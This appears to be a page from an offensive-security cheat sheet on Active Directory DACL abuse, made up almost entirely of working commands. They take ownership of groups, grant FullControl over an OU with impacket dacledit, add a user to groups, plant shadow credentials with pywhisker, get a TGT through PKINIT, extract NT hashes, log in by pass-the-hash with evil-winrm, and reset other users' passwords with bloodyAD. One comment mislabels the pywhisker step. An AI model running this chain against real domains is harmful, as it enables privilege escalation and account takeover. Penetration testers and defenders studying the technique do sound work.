DACL (Discretionary Access Control List) Attack

DACL is a list of the trustees that are allowed or denied access to objects in Active Directory.

Set Ownership of Group

Using BloodyAD, we can set the user as the owner of a group.

# Install if it does not exist on your machine.
pipx install bloodyAD

bloodyAD --host dc.example.local -d example.local -u <username> -p <password> set owner <group-name> <username>

Add Rights

We may be able to take a full control of securable objects by getting GenericAll permission on OU (Organizational Unit).

1. Ask TGT for Kerberos Authentication

If we want to use Kerberos authentication for attacking DACL, we need to retrieve a TGT for specific user at first. In addition, to avoid authentication error, we need to synchronize the system time with the domain controller using ntpdate or rdate.

# Sync datetime with target system
sudo ntpdate <target-ip>
# or
sudo rdate -n <target-ip>

impacket-getTGT -dc-ip <target-ip> example.local/username:password

The getTGT above dumps a .ccache file which stores TGT.

After dumping the .ccache file, set it to an environment variable for using the later processing.

export KRB5CCNAME=username.ccache

2. Read DACL

We can use dacledit of impackets. To use dacledit, we need to clone the repository and install dependencies as below:

git clone https://github.com/fortra/impacket.git
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install impacket
pip3 install -r requirements.txt
python3 examples/dacledit.py --help

Note: This repository is updated frequently so errors may occur. If so, try using the git log and git checkout <prev_commit_id> commands to revert to the previous commit and then run it.

Then run the following command:

python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k

3. Write DACL

python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k

Abuse

After adding rights, we can abuse it with various methods.

Method 1. Add User to Group → Get TGT → Get NT Hash

# 1. Add user to a specific group (replace the group distinguished name with your target)
bloodyAD --host <target-ip> -u <username> -p <password> add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>
# with Kerberos auth (-k)
bloodyAD --host <target-ip> -u <username> -k add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>

# 2. Add the target user to a privileged group
python3 pywhisker.py -d example.local -u <username> -p <password> --target <target-username> --action add

# 3. Obtain a Kerberos TGT using PKINIT authentication with a PFX certificate
python3 gettgtpkinit.py example.local/<target-username> -cert-pfx <pfx-filepath> -pfx-pass <pfx-password> ./example.ccache

export KRB5CCNAME=./example.ccache

# 4. Retrieve the NT hash of the target user using the obtained Kerberos ticket
python3 getnthash.py example.local/<target-username> -key <key>

# 5. Login with the retrieved NT hash
evil-winrm -i <target-ip> -u <target-username> -H <nt-hash>

Method 2. Set Password of Another User

If an user have the permission to set another user password, we can change the password:

bloodyAD --host <target-ip> -u <username> -p <password> set password '<target-username>' '<new-password>'
# with Kerberos auth (-k)
bloodyAD --host <target-ip> -u <username> -k set password '<target-username>' '<new-password>'

After that, we can try further attacks using this user.

References

PreviousConstrained Delegation Attack NextKerberoasting Attack

Last updated 1 month ago

hashtagSet Ownership of Group

hashtagAdd Rights

hashtag1. Ask TGT for Kerberos Authentication

hashtag2. Read DACL

hashtag3. Write DACL

hashtagAbuse

hashtagMethod 1. Add User to Group → Get TGT → Get NT Hash

hashtagMethod 2. Set Password of Another User

hashtagReferences